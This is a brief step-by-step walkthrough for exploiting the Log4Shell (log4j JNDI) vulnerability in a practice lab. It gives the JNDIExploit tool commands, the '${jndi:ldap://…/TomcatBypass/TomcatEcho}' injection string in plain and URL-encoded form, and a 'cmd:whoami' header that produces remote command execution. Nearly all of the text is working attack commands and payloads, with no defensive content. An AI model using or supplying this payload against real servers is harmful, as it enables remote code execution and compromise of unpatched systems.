1. First build the log4j shooting range
2. Start the service
Windows attacker executes the following command
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1
Open another cmd to see what payload can be used
java -jar JNDIExploit-1.2-SNAPSHOT.jar -u
You can try the above payloads. We use
ldap://null:1389/TomcatBypass/TomcatEcho
3. Construct the request
${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}
and convert it to URL
%24%7Bjndi%3Aldap %3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D
4. Add cmd:whoami to the bp
request packet
After execution, it is found that the command can be executed